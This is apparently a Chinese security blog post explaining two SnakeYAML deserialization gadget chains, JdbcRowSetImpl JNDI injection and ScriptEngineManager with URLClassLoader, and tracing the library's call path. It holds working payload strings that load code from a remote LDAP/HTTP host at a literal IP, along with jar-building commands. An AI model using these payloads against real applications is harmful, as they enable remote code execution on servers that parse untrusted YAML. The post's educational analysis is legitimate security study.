- 1C++实现进栈、出栈_c++进栈出栈程序
- 2git的.gitignore文件更新后不起作用_git修改gitignore不生效
- 3将本地项目上传到Github
- 430岁跨行跳槽,工资翻倍:那些0基础学测试的人现在怎么样了?_30岁女生0基础跨行上万工资
- 5FPGA学习笔记:数据采集传输系统设计(四):FIFO IP核调用与仿真波形解读_fpga dma传输来自fifo的数据
- 6【机器学习】在Python中使用交叉验证进行SHAP解释
- 7idea2024新特性以及idea2024.1版本安装、激活
- 8spring boot后端开发基础
- 9STM32读取MPU6050角度数据OLED显示_stm32 mpu6050 oled
- 10为何重复造轮子
【Web】浅浅地聊SnakeYaml反序列化两条常见利用链
赞
踩
目录
关于Yaml
学过SpringBoot开发的师傅都知道,YAML和 Properties 文件都是常见的配置文件格式,用于存储键值对数据。
这里举几个Yaml的例子回顾一下
- # 示例 YAML 文件
-
- # 字符串和整数
- name: John Doe
- age: 30
-
- # 列表
- languages:
- - Python
- - JavaScript
- - Java
-
- # 映射
- address:
- street: 123 Main Street
- city: Anytown
- postal_code: 12345
-
- # 嵌套结构
- person:
- name: Alice
- age: 25
- address:
- street: 456 Elm Street
- city: Somewhere
- postal_code: 54321
上面的例子体现了几个Yaml的特性:
使用 key: value 的格式表示键值对数据。
使用缩进表示层次结构,比如 languages 是一个列表,address 是一个映射。
支持注释,以 # 开头。
如何表示字符串、整数、列表和嵌套结构。
此外,在 YAML 中,方括号 [] 和双方括号 [[...]] 分别表示列表和嵌套列表的含义。
-
单方括号
[]表示列表:- 在 YAML 中,单方括号
[]表示一个简单的列表,其中可以包含一组项目。 - 例如,
items: [apple, banana, orange]表示一个包含三个字符串元素的列表。
- 在 YAML 中,单方括号
-
双方括号
[[...]]表示嵌套列表:- 双方括号
[[...]]表示一个嵌套的列表,即一个列表中包含另一个列表。 - 这种结构用于表示更复杂的数据结构,其中内部列表中可以包含多个项目。
- 在嵌套列表中,每对方括号表示一个新的列表层级。
- 例如,
nestedList: [[1, 2], [3, 4], [5, 6]]表示一个包含三个子列表的父列表,每个子列表包含两个整数元素。
- 双方括号
关于SnakeYaml
SnakeYAML 是 Java 中一个流行的 YAML 解析库,用于读取和生成 YAML 数据。
1.加载(Load)YAML 数据: 使用 SnakeYAML 的 load 方法可以将 YAML 数据加载到 Java 对象中。这个方法会将 YAML 格式的数据解析为对应的 Java 对象。
2.转储(Dump)Java 对象为 YAML 格式: 使用 SnakeYAML 的 dump 方法可以将 Java 对象转换为对应的 YAML 格式数据。
举例:
一个User Bean
- package com.snake.demo;
-
- public class User {
- private String name;
- public int age;
-
- public User(String name, int age) {
- this.name = name;
- this.age = age;
- }
-
- public User() {
- System.out.println("Non Arg Constructor");
- }
-
- public String getName() {
- System.out.println("getName");
- return name;
- }
-
- public void setName(String name) {
- System.out.println("setName");
- this.name = name;
- }
-
- public int getAge() {
- System.out.println("getAge");
- return age;
- }
-
- public void setAge(int age) {
- System.out.println("setAge");
- this.age = age;
- }
-
- @Override
- public String toString() {
- return "I am " + name + ", " + age + " years old";
- }
- }
测试类
- package com.snake.demo;
-
- import org.yaml.snakeyaml.Yaml;
-
- public class Main {
- public static void main(String[] args) {
- User user = new User("Z3r4y", 18);
- Yaml yaml = new Yaml();
- System.out.println(yaml.dump(user));
-
- String s = "!!com.snake.demo.User {age: 18, name: Z3r4y}";
- User user2 = yaml.load(s);
- System.out.println(user2);
- }
- }
运行结果
- getName
- !!com.snake.demo.User {age: 18, name: Z3r4y}
-
- Non Arg Constructor
- setName
- I am Z3r4y, 18 years old
通过上述lab,我们至少可以得到以下两点结论:
①yaml反序列化时可以通过!!+全类名指定反序列化的类,反序列化过程中会实例化该类
②四种属性修饰,private,protected,public,default,若属性设置为public,则不会调用对应的setter方法,当属性为public时,是通过反射对Field进行了set,而当属性为private时,是通过反射调用setName设置的值
SnakeYaml反序列化利用
SnakeYaml反序列化和fastjson反序列化一样都会调用setter,不过对于public修饰的成员不会调用其setter。
除此之外,SnakeYaml反序列化时还能调用该类的构造函数
于是乎便分别有了以下两种的利用
JdbcRowSetImpl链
调用JdbcRowSetImpl#setAutoCommit,这样就成功触发了JdbcRowSetImpl链,从而JNDI注入
先导pom依赖
- <dependency>
- <groupId>org.yaml</groupId>
- <artifactId>snakeyaml</artifactId>
- <version>1.27</version>
- </dependency>
编写POC
- package com.snake.demo;
-
- import org.yaml.snakeyaml.Yaml;
-
- public class POC1 {
- public static void main(String[] args) {
- String poc = "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: ldap://124.222.136.33:1337/#suibian, autoCommit: true}";
- Yaml yaml = new Yaml();
- yaml.load(poc);
- }
- }
开一个恶意LDAP服务器
找个端口放恶意字节码
成功弹计算器
和FastJson反序列化原理一样的,不多解释,可以看这篇文章:【Web】速谈FastJson反序列化中JdbcRowSetImpl的利用
ScriptEngineManager链
复现
javax.script.ScriptEngineManager的利用链通过URLClassLoader实现的代码执行,底层是个SPI,关于SPI可以看看这篇文章,不多赘述:
【Web】浅浅地聊JDBC java.sql.Driver的SPI后门
【Web】浅聊JDBC的SPI机制是怎么实现的——DriverManager-CSDN博客
github上现成的利用ScriptEngineManager利用方式的exp:
GitHub - artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads
拿到手稍微小改下这个部分代码就可
运行下列命令生成个jar包
- javac src/artsploit/AwesomeScriptEngineFactory.java
- jar -cvf yaml-payload.jar -C src/ .
然后开个端口把恶意jar包放服务器上
运行这段代码,弹出计算器
- package com.snake.demo;
-
- import org.yaml.snakeyaml.Yaml;
-
- public class POC2 {
- public static void main(String[] args) {
- String poc = "!!javax.script.ScriptEngineManager [\n" +
- " !!java.net.URLClassLoader [[\n" +
- " !!java.net.URL [\"http://124.222.136.33:1337/yaml-payload.jar\"]\n" +
- " ]]\n" +
- "]";
- Yaml yaml = new Yaml();
- yaml.load(poc);
- }
- }
基本原理
OK复现成功了,我们跟下调用链
首先看到javax.script.ScriptEngineManager的有参构造方法调用了init,并传入了一个ClassLoader,至于从哪传的,后面会讲,暂按下不表。
- public ScriptEngineManager(ClassLoader loader) {
- init(loader);
- }
init方法进行一些初始化设置之后调用initEngines()
- private void init(final ClassLoader loader) {
- globalScope = new SimpleBindings();
- engineSpis = new HashSet<ScriptEngineFactory>();
- nameAssociations = new HashMap<String, ScriptEngineFactory>();
- extensionAssociations = new HashMap<String, ScriptEngineFactory>();
- mimeTypeAssociations = new HashMap<String, ScriptEngineFactory>();
- initEngines(loader);
- }
initEngines方法,调用了getServiceLoader
- private void initEngines(final ClassLoader loader) {
- Iterator<ScriptEngineFactory> itr = null;
- try {
- ServiceLoader<ScriptEngineFactory> sl = AccessController.doPrivileged(
- new PrivilegedAction<ServiceLoader<ScriptEngineFactory>>() {
- @Override
- public ServiceLoader<ScriptEngineFactory> run() {
- return getServiceLoader(loader);
- }
- });
-
- itr = sl.iterator();
- }
跟进getServiceLoader方法
- private ServiceLoader<ScriptEngineFactory> getServiceLoader(final ClassLoader loader) {
- if (loader != null) {
- return ServiceLoader.load(ScriptEngineFactory.class, loader);
- } else {
- return ServiceLoader.loadInstalled(ScriptEngineFactory.class);
- }
- }
返回一个ServiceLoader<T>,根据这个可以获取一个指定了加载类为ScriptEngineFactory的迭代器,这也和我们生成恶意jar包的项目的META-INF/services目录下的文件名呼应
ok到这一步我们已经获得了一个指定了加载类为ScriptEngineFactory的迭代器
initEngines方法接着向下执行又看到了两个熟悉的方法hasNext()、next()
- try {
- while (itr.hasNext()) {
- try {
- ScriptEngineFactory fact = itr.next();
- engineSpis.add(fact);
- } catch (ServiceConfigurationError err) {
- System.err.println("ScriptEngineManager providers.next(): "
- + err.getMessage());
- if (DEBUG) {
- err.printStackTrace();
- }
- // one factory failed, but check other factories...
- continue;
- }
- }
- }
不多作赘余解释,这篇文章里有写:【Web】浅聊JDBC的SPI机制是怎么实现的——DriverManager-CSDN博客
总结来说就是:
hashNext用于获取全路径,并读取文件中的内容
next用于执行文件中对应的类,导致恶意类的动态加载,恶意静态代码块的执行,从而完成攻击
问题是,恶意类来自哪呢?是来自反序列化调用远程jar包
如何调用远程的jar包呢?只能说是由URLClassLoader和URL来具体操作的,我们不做具体讨论
原理这部分到此为止。
继续深入
我们先回到本源,来看看Yaml#load是如何操作
public <T> T load(String yaml) {
return this.loadFromReader(new StreamReader(yaml), Object.class);
}
先是将我们的payload字符串存入StreamReader的stream中
public StreamReader(Reader reader) {
this.pointer = 0;
this.index = 0;
this.line = 0;
this.column = 0;
this.name = "'reader'";
this.dataWindow = new int[0];
this.dataLength = 0;
this.stream = reader;
this.eof = false;
this.buffer = new char[1025];
}
OK,我们再回到loadFromReader(),其创建了一个Composer对象,并封装到constructor中
private Object loadFromReader(StreamReader sreader, Class<?> type) {
Composer composer = new Composer(new ParserImpl(sreader), this.resolver, this.loadingConfig);
this.constructor.setComposer(composer);
return this.constructor.getSingleData(type);
}
跟一下this.constructor.getSingleData
代码中首先通过 composer 对象的 getSingleNode 方法获取一个节点(Node)对象。接着判断该节点是否为非空且不是表示空值的特殊标记。如果条件成立,则继续执行下面的逻辑,否则会返回一个表示空值的对象。
public Object getSingleData(Class<?> type) {
Node node = this.composer.getSingleNode();
if (node != null && !Tag.NULL.equals(node.getTag())) {
if (Object.class != type) {
node.setTag(new Tag(type));
} else if (this.rootTag != null) {
node.setTag(this.rootTag);
}
return this.constructDocument(node);
} else {
Construct construct = (Construct)this.yamlConstructors.get(Tag.NULL);
return construct.construct(node);
}
}
接着调用constructDocument()
protected final Object constructDocument(Node node) {
Object var3;
try {
Object data = this.constructObject(node);
this.fillRecursive();
var3 = data;
}
跟constructObject
protected Object constructObject(Node node) {
if (constructedObjects.containsKey(node)) {
return constructedObjects.get(node);
}
return constructObjectNoCheck(node);
}
跟 constructObjectNoCheck
constructObjectNoCheck()中recursiveObjects值为空,所以不执行if,并通过add将node追加到其中,之后由于constructedObjects值也是空,所以三目运算执行" : "后边的内容
protected Object constructObjectNoCheck(Node node) {
if (recursiveObjects.contains(node)) {
throw new ConstructorException(null, null, "found unconstructable recursive node",
node.getStartMark());
}
recursiveObjects.add(node);
Construct constructor = getConstructor(node);
Object data = (constructedObjects.containsKey(node)) ? constructedObjects.get(node)
: constructor.construct(node);
node放入recursiveObjects,进入constructor.construct(node)
public Object construct(Node node) {
try {
return getConstructor(node).construct(node);
} catch (ConstructorException e) {
throw e;
} catch (Exception e) {
throw new ConstructorException(null, null, "Can't construct a java object for "
+ node.getTag() + "; exception=" + e.getMessage(), node.getStartMark(), e);
}
}
再跟construct
for (Node argumentNode : snode.getValue()) {
Class<?> type = c.getParameterTypes()[index];
// set runtime classes for arguments
argumentNode.setType(type);
argumentList[index++] = constructObject(argumentNode);
}
遍历节点,调用constructObject()又给循环回去
上面的POC有5个node,循环5次。
先后进行了URL、URLClassLoader、ScriptEngineManager的实例化
注意这里实例化是有传参数(argumentList)的,把前一个类的实例化对象当作下个类构造器的参数。
最后进入ScriptEngineManager的有参构造器,连接上了上文的SPI机制。
